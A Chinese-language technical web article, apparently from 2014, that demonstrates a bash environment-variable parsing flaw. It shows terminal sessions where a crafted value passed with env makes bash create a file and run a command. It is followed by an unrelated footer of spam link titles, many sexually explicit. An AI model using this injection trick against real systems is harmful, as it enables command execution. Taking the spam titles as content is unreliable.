《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網站原創,未經授權禁止轉載。
主站蜘蛛池模板: 国产精品美女久久久久AV福利| 打开双腿让老乞丐玩| 亚洲欧美色鬼久久综合| 精品偷自拍另类在线观看| 打扑克又痛又叫原声| 久久精品无码一区二区三区| 欧美午夜理伦三级在线观看| 亚洲精品乱码久久久久久| 粗大的内捧猛烈进出小视频| 四月婷婷七月婷婷综合| 蜜桃精品免费久久久久影院| 国产强伦姧在线观看| 日本a∨在线观看| 国产精品对白交换视频| 91麻豆国产级在线| 大肉大捧一进一出好爽视频动漫| 一个人看的www在线免费视频| 成年性生交大片免费看| 久re这里只有精品最新地址| 日本理论片午午伦夜理片2021| 久久这里有精品视频| 男人进的越深越爽动态图| 午夜老司机在线观看免费| 自拍偷自拍亚洲精品播放| 国产剧情在线播放| 91免费看国产| 性欧美高清come| 亚洲JIZZJIZZ中国少妇中文| 欧美成人精品第一区二区三区| 亚洲精品国产第1页| 爱情岛论坛亚洲品质自拍视频网站| 免费爱爱的视频太爽了| 精品久久洲久久久久护士免费| 午夜精品久久久久久99热| 美女被cao免费看在线看网站| 国产一二三区视频| 色欲麻豆国产福利精品| 国产乱人视频在线播放| fc2ppv在线观看| 国产精品亚洲一区在线播放| 2020求一个网站男人都懂|